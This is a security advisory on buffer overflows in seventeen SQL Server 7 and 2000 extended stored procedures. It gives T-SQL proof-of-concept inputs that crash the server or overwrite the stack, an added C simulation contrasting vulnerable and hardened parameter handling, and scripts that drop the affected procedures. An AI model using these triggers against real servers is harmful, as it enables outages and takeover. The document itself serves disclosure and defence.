Microsoft SQL Server: Buffer Overflows in numerous extended stored procedures

Credit: These vulnerabilities were discovered by Cesar Cerrudo (sqlsec@yahoo.com)

Risk level: High

Summary:

Numerous extended stored procedures in Microsoft SQL Server 7 and 2000 contain buffer overflows. Depending on the length of the input, these overflows result in one of two scenarios:

1 - The database server crashes.
2 - Memory on the stack is overwritten, including the return address of the calling function, resulting in an exception being thrown (or, with a crafted buffer, in attacker-supplied code being executed).
These buffer overflows are the result of passing unusually long strings as parameters to extended stored procedures. The majority of them are triggered by large Unicode buffers. Although the overflowing data is a Unicode string (every second byte is zero), exploiting them is not particularly difficult given techniques such as Chris Anley's "Venetian" method, which allows arbitrary shellcode to be built out of Unicode-expanded buffers.

The following extended stored procedures are vulnerable:

xp_controlqueueservice
xp_createprivatequeue
xp_createqueue
xp_decodequeuecmd
xp_deleteprivatequeue
xp_deletequeue
xp_displayqueuemesgs
xp_dsninfo
xp_mergelineages
xp_oledbinfo
xp_proxiedmetadata
xp_readpkfromqueue
xp_readpkfromvarbin
xp_repl_encrypt
xp_resetqueue
xp_sqlinventory
xp_unpackcab
Details:

Microsoft SQL Server provides the ability to call functions in DLLs outside of the database. These functions, called extended stored procedures, greatly expand the functionality of Microsoft SQL Server: they can be used to access the operating system or the network. Several hundred are shipped with Microsoft SQL Server, and custom-developed extended stored procedures can be added to the database by the administrator.

Based on the findings of Cesar Cerrudo (sqlsec@yahoo.com), the extended stored procedures listed above contain buffer overflows that allow arbitrary shell code to be inserted onto the stack. By default, a few of these extended stored procedures are granted to the public group (xp_mergelineages and xp_proxiedmetadata in the results below). Those granted to public allow a non-privileged database user to gain full control of the operating system and the database. For those extended stored procedures that are not granted to public by default, two concerns still exist:

1) The DBA of one instance can gain full control of the operating system, and thereby of other instances and programs on the same server.
2) If a DBA has granted execute permission on one of these extended stored procedures to a non-privileged user, that user can gain full control of the system.

The problem is caused by assumptions in the extended stored procedures about the data types and sizes being passed in. Extended stored procedures do not accept parameters directly as other functions do. Instead, an extended stored procedure retrieves the parameters passed to it through a set of API functions, the most important of which is srv_paraminfo. Below is the definition of this function:

int srv_paraminfo (
    SRV_PROC * srvproc,
    int n,
    BYTE * pbType,
    ULONG * pcbMaxLen,
    ULONG * pcbActualLen,
    BYTE * pbData,
    BOOL * pfNull
);

An extended stored procedure uses this call to determine the data type and length of each parameter passed to it. A varchar is limited to 8000 characters and an nvarchar to 4000 characters.
If, however, an ntext (maximum length 2^30 - 1, i.e. 1,073,741,823 characters) is passed to a parameter that expects an nvarchar, and the extended stored procedure copies that parameter into a buffer sized for a much smaller nvarchar, the stack is overwritten. The same happens when the procedure's buffer is smaller than even the nvarchar maximum, which is why many of the results below trigger with plain varchar/nvarchar inputs.

Below are the results of the Team SHATTER research for each individual buffer overflow. All tests were performed against a default installation with the latest Microsoft SQL Server service packs applied, as shown here:

Microsoft SQL Server 2000 - 8.00.578 (Intel X86) Feb 12 2002 20:54:17
Microsoft SQL Server 7.00 - 7.00.1021 (Intel X86) Feb 18 2002 15:16:10

__________________________________________

xp_controlqueueservice

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- buffer overflow starts overwriting the error message coming back from MSSQL
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',121))
execute xp_controlqueueservice @test, ''

Server: Msg 50007, Level 16, State 1, Line 0
np_controlqueueservice: Message Queuing does not exist as an installed service

-- here it is overwriting another 79 characters
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',200))
execute xp_controlqueueservice @test, ''

Server: Msg 50007, Level 16, State 1, Line 0
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn

-- xp_controlqueueservice has two input parameters: @control_command, @return_result OUTPUT
-- crashes the server starting at 767 characters
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',767))
execute xp_controlqueueservice @test, ''
__________________________________________

xp_createprivatequeue

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- generates an exception at 257 Unicode characters, but doesn't crash the server
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',257))
execute xp_createprivatequeue @test

-- crashes the server at 492 Unicode characters or more
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',492))
execute xp_createprivatequeue @test

-- generates an exception at 513 non-Unicode characters, but doesn't crash the server
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',513))
execute xp_createprivatequeue @test

-- crashes the server at 983 non-Unicode characters or more
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',983))
execute xp_createprivatequeue @test

__________________________________________

xp_createqueue

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- buffer overflow at 1286 non-Unicode characters
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',1286))
execute xp_createqueue @test,'','','','',''

-- starting at 1743 non-Unicode characters the server crashes
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',1743))
execute xp_createqueue @test,'','','','',''

-- a Unicode buffer crashes the database
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',1742))
execute xp_createqueue @test,'','','','',''

__________________________________________

xp_decodequeuecmd

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for Unicode buffers only

Code examples:

DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_decodequeuecmd @test,''
__________________________________________

xp_deleteprivatequeue

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- non-Unicode buffer causes the server to crash
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_deleteprivatequeue @test,''

-- Unicode buffer also causes the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_deleteprivatequeue @test,''

__________________________________________

xp_deletequeue

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- non-Unicode buffer causes the server to crash
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_deletequeue @test,''

-- Unicode buffer also causes the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_deletequeue @test,''

__________________________________________

xp_displayqueuemesgs

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- non-Unicode buffer causes the server to crash
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_displayqueuemesgs @test,'','','',''

-- Unicode buffer also causes the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_displayqueuemesgs @test,'','','',''

__________________________________________

xp_dsninfo

Versions vulnerable: SQL Server 7.0 (xpsql70.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- buffer overflow at 38 non-Unicode characters or more, but no server crash
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',38))
execute xp_dsninfo @test

-- buffer overflow with a Unicode buffer of 38 characters or more, but no server crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',38))
execute xp_dsninfo @test

-- buffer overflow at 78 bytes or more caused the server to crash
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_dsninfo @test

-- buffer overflow with a Unicode buffer of 511 characters or more caused the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',511))
execute xp_dsninfo @test

__________________________________________

xp_mergelineages

Versions vulnerable: SQL Server 2000 (xprepl.dll)
Default permissions granted: public
Overflow occurred for Unicode buffers

Code examples:

-- buffer overflow when a Unicode buffer of more than 4000 characters is passed as the first parameter
xp_mergelineages N'AAAAAAAAAA[4000+]', '', ''
__________________________________________

xp_oledbinfo

Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll)
Default permissions granted: dbo
Overflow occurred for non-Unicode buffers

Code examples:

-- For SQL Server 7.0
-- anything 4000 non-Unicode characters or greater causes an overflow
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_oledbinfo @test,'','','','','','',''

-- For SQL Server 2000
-- buffer overflow, but the server does not crash
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',8000))
execute xp_oledbinfo @test,'','','','','','',''
__________________________________________

xp_proxiedmetadata

Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll)
Default permissions granted: public
Overflow occurred for Unicode buffers

Code examples:

-- overflow on both SQL Server 7.0 and 2000 when a Unicode buffer greater than 4000 characters is passed as the first parameter
xp_proxiedmetadata N'AAAAAAAAAA[4000+]', '', '', ''
__________________________________________

xp_readpkfromqueue

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- non-Unicode buffer overflow in the 1st parameter
xp_readpkfromqueue 'AAAAAAAAAA[10,000+]','',''

-- Unicode buffer overflow in the 1st parameter
xp_readpkfromqueue N'AAAAAAAAAA[5,000+]','',''

-- buffer overflow in the 3rd parameter
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_readpkfromqueue N' ', N' ',@test

__________________________________________

xp_readpkfromvarbin

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- non-Unicode buffer overflow in the 1st parameter
xp_readpkfromvarbin 'AAAAAAAAAA[10,000+]',N'x',N'x',0,0x87

-- Unicode buffer overflow in the 1st parameter
xp_readpkfromvarbin N'AAAAAAAAAA[5,000+]',N'x',N'x',0,0x87

-- buffer overflow in the 3rd parameter
DECLARE @test nvarchar(4000)
DECLARE @test1 varbinary(4000)
select @test1 = cast((SELECT replicate(N'n',4000)) as varbinary)
SET @test = (SELECT replicate(N'n',4000))
execute xp_readpkfromvarbin N' ', N' ', @test, 0, @test1

__________________________________________

xp_repl_encrypt

Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- For SQL Server 7.0
-- anything 4000 non-Unicode characters or greater causes an overflow
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_repl_encrypt @test

-- a 4000 character Unicode buffer causes a buffer overflow
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_repl_encrypt @test

-- For SQL Server 2000
-- anything 4000 non-Unicode characters or greater causes an overflow
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_repl_encrypt @test

-- a Unicode buffer overflow could not be reproduced on SQL Server 2000

__________________________________________

xp_resetqueue

Versions vulnerable: SQL Server 2000 (xpqueue.dll)
Default permissions granted: dbo
Overflow occurred for both Unicode and non-Unicode buffers

Code examples:

-- a 4000 character Unicode buffer causes a buffer overflow
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_resetqueue @test, '', '', '', ''

-- a 4000 character non-Unicode buffer causes a buffer overflow
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_resetqueue @test, '', '', '', ''

__________________________________________

xp_sqlinventory

Versions vulnerable: SQL Server 7.0 (xpstar.dll)
Default permissions granted: dbo
Overflow occurred for Unicode buffers

Code examples:

-- overflow when a Unicode buffer greater than 4000 characters is passed as the first parameter
xp_sqlinventory N'AAAAAAAAAA[4000+]', '', ''

__________________________________________

xp_unpackcab

Versions vulnerable: SQL Server 2000 (xprepl.dll)
Default permissions granted: dbo
Overflow occurred for Unicode buffers

Code examples:

-- buffer overflow, but the server does not crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_unpackcab 'anything', @test, 'none'
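The pattern behind all of the results above, as an added example that is not part of the original advisory and is not Microsoft's code: a small C model of an extended stored procedure's parameter handling, written to be compiled and run without SQL Server. The real Open Data Services API is not linked; SRV_PROC, srv_paraminfo and the type codes SRVNVARCHAR/SRVNTEXT are in-memory stand-ins with the same signature (assumed behaviour: a NULL pbData returns the lengths without copying, as the ODS documentation describes, and the type values are the TDS type bytes; confirm both against opends60.h). The "stack frame" is a byte array so the overwrite of the saved return address can be observed rather than crashing the process; the simulation-only cap in vulnerable_handler exists for the same reason and has no counterpart in a real XP.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ODS data type codes. Assumed values (the TDS type bytes ODS exposes);
 * confirm against opends60.h when building a real XP. */
#define SRVNVARCHAR 0xE7
#define SRVNTEXT    0x63

/* Stand-in for the ODS SRV_PROC handle: just the parameters of one call. */
typedef struct {
    uint8_t        type;        /* pbType */
    unsigned long  max_len;     /* pcbMaxLen: declared maximum, in bytes */
    unsigned long  actual_len;  /* pcbActualLen: bytes the client really sent */
    const uint8_t *data;        /* NULL means SQL NULL */
} MockParam;
typedef struct { MockParam params[8]; int nparams; } SRV_PROC;

/* Stand-in for srv_paraminfo() with the real signature. Assumed contract:
 * reports type and lengths of parameter n (1-based) and copies the data
 * only when pbData is non-NULL, so a caller can ask for the length first.
 * Like the real call it copies pcbActualLen bytes; bounding is the XP's job. */
int srv_paraminfo(SRV_PROC *srvproc, int n, uint8_t *pbType,
                  unsigned long *pcbMaxLen, unsigned long *pcbActualLen,
                  uint8_t *pbData, int *pfNull)
{
    if (n < 1 || n > srvproc->nparams) return 0;                  /* FAIL */
    const MockParam *p = &srvproc->params[n - 1];
    *pbType = p->type; *pcbMaxLen = p->max_len; *pcbActualLen = p->actual_len;
    *pfNull = (p->data == NULL);
    if (pbData != NULL && p->data != NULL) memcpy(pbData, p->data, p->actual_len);
    return 1;                                                     /* SUCCEED */
}

/* Simulated stack frame of the XP: a 256-byte local buffer for a queue name
 * directly followed by the caller's saved return address, the layout the
 * advisory describes being overwritten. A plain byte array, so the
 * overwrite is observable instead of fatal. */
enum { NAME_BUF = 256, FRAME_BYTES = NAME_BUF + 4 };
typedef struct { uint8_t bytes[FRAME_BYTES]; } Frame;

void frame_init(Frame *f)
{
    memset(f->bytes, 0, sizeof f->bytes);
    const uint8_t ret[4] = { 0x44, 0x43, 0x42, 0x41 };   /* 0x41424344, little-endian */
    memcpy(f->bytes + NAME_BUF, ret, 4);
}

uint32_t saved_return(const Frame *f)
{
    const uint8_t *b = f->bytes + NAME_BUF;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Vulnerable pattern (what the listed XPs did): assume parameter 1 is a short
 * nvarchar and copy whatever actual length the server reports. */
int vulnerable_handler(SRV_PROC *srvproc, Frame *f)
{
    uint8_t type; unsigned long maxlen, actlen; int isnull;
    if (!srv_paraminfo(srvproc, 1, &type, &maxlen, &actlen, NULL, &isnull)) return -1;
    if (actlen > FRAME_BYTES) return -2;   /* simulation-only cap; a real XP had no check here */
    /* BUG: actlen may exceed NAME_BUF, so the copy runs over the saved return address. */
    srv_paraminfo(srvproc, 1, &type, &maxlen, &actlen, f->bytes, &isnull);
    return 0;
}

/* Hardened form: check type, NULL and actual length before any copy, and
 * leave room for the UTF-16 terminator. */
int hardened_handler(SRV_PROC *srvproc, Frame *f)
{
    uint8_t type; unsigned long maxlen, actlen; int isnull;
    if (!srv_paraminfo(srvproc, 1, &type, &maxlen, &actlen, NULL, &isnull)) return -1;
    if (type != SRVNVARCHAR) return -3;                        /* ntext (or anything else) refused */
    if (isnull) return -4;
    if (actlen % 2 != 0 || actlen > NAME_BUF - 2) return -5;   /* too long for the buffer */
    srv_paraminfo(srvproc, 1, &type, &maxlen, &actlen, f->bytes, &isnull);
    f->bytes[actlen] = 0; f->bytes[actlen + 1] = 0;
    return 0;
}

/* Constructed input: parameter 1 is nbytes of UTF-16LE 'n' (6E 00 6E 00 ...),
 * what replicate(N'n', nbytes/2) in the advisory's T-SQL delivers. */
static uint8_t payload[FRAME_BYTES];
void make_call(SRV_PROC *p, uint8_t type, unsigned long nbytes)
{
    for (size_t i = 0; i < sizeof payload; i++) payload[i] = (i % 2) ? 0x00 : 'n';
    if (nbytes > sizeof payload) nbytes = sizeof payload;
    p->nparams = 1;
    p->params[0].type = type;
    p->params[0].max_len = (type == SRVNTEXT) ? 0x3FFFFFFFUL : 8000UL;  /* 2^30-1 chars vs nvarchar(4000) */
    p->params[0].actual_len = nbytes;
    p->params[0].data = payload;
}

/* Run one handler on a fresh frame with the constructed input: rc_of() gives
 * the handler's result, ret_after() the saved return address afterwards. */
static int run_case(int (*h)(SRV_PROC *, Frame *), uint8_t type, unsigned long nbytes, uint32_t *ret)
{
    SRV_PROC call; Frame f;
    make_call(&call, type, nbytes);
    frame_init(&f);
    int rc = h(&call, &f);
    *ret = saved_return(&f);
    return rc;
}
int rc_of(int (*h)(SRV_PROC *, Frame *), uint8_t type, unsigned long nbytes)
{ uint32_t r; return run_case(h, type, nbytes, &r); }
uint32_t ret_after(int (*h)(SRV_PROC *, Frame *), uint8_t type, unsigned long nbytes)
{ uint32_t r; run_case(h, type, nbytes, &r); return r; }

int main(void)
{
    /* An ntext of 130 characters (260 bytes) where a short nvarchar was assumed. */
    printf("vulnerable: rc=%d saved_return=0x%08" PRIx32 "\n",
           rc_of(vulnerable_handler, SRVNTEXT, FRAME_BYTES), ret_after(vulnerable_handler, SRVNTEXT, FRAME_BYTES));
    printf("hardened:   rc=%d saved_return=0x%08" PRIx32 "\n",
           rc_of(hardened_handler, SRVNTEXT, FRAME_BYTES), ret_after(hardened_handler, SRVNTEXT, FRAME_BYTES));
    return 0;
}
```

Run stand-alone, the vulnerable handler returns 0 with a saved return address of 0x006E006E: the 'n',0x00 pairs of the UTF-16 payload, which is exactly the every-other-byte-zero pattern the Venetian technique is built to work with, and the same thing happens when the type is a plain nvarchar of the same length. The hardened handler refuses the ntext before any copy and refuses an overlong nvarchar for the buffer. In a real XP the rejection should be reported to the client with srv_sendmsg and the procedure should return FAIL rather than silently truncating.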
Fix:

There is currently no patch or hotfix available from Microsoft, although it is expected that one will be available in the next few days. Until a patch is available, it is recommended that you remove these extended stored procedures from the database and remove the underlying DLLs from the system. Dropping the procedures from master stops them being called by anyone below sysadmin (a sysadmin can re-register them with sp_addextendedproc, which is why removing the DLLs is recommended as well). Note that the DLLs, xpstar.dll in particular, also host extended stored procedures that are not listed here, so deleting the files disables those too.

To remove these extended stored procedures from Microsoft SQL Server 2000, run the following script:

use master
go
drop procedure xp_decodequeuecmd
go
drop procedure xp_controlqueueservice
go
drop procedure xp_createprivatequeue
go
drop procedure xp_createqueue
go
drop procedure xp_deleteprivatequeue
go
drop procedure xp_deletequeue
go
drop procedure xp_displayqueuemesgs
go
drop procedure xp_mergelineages
go
drop procedure xp_oledbinfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_readpkfromqueue
go
drop procedure xp_readpkfromvarbin
go
drop procedure xp_repl_encrypt
go
drop procedure xp_resetqueue
go
drop procedure xp_unpackcab
go
To remove these extended stored procedures from Microsoft SQL Server 7.0, run the following script:

use master
go
drop procedure xp_repl_encrypt
go
drop procedure xp_oledbinfo
go
drop procedure xp_dsninfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_sqlinventory
go
After applying the hotfix, you can add the extended stored procedures for Microsoft SQL Server 2000 back by running the following commands:

use master
go
exec sp_addextendedproc 'xp_decodequeuecmd', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_controlqueueservice', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_createprivatequeue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_createqueue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_deleteprivatequeue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_deletequeue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_displayqueuemesgs', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_mergelineages', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_oledbinfo', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_proxiedmetadata', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_readpkfromqueue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_readpkfromvarbin', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_repl_encrypt', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_resetqueue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_unpackcab', 'xprepl.dll'
go
After applying the hotfix, you can add the extended stored procedures for Microsoft SQL Server 7.0 back by running the following commands:

use master
go
exec sp_addextendedproc 'xp_repl_encrypt', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_oledbinfo', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_dsninfo', 'xpsql70.dll'
go
exec sp_addextendedproc 'xp_proxiedmetadata', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_sqlinventory', 'xpstar.dll'
go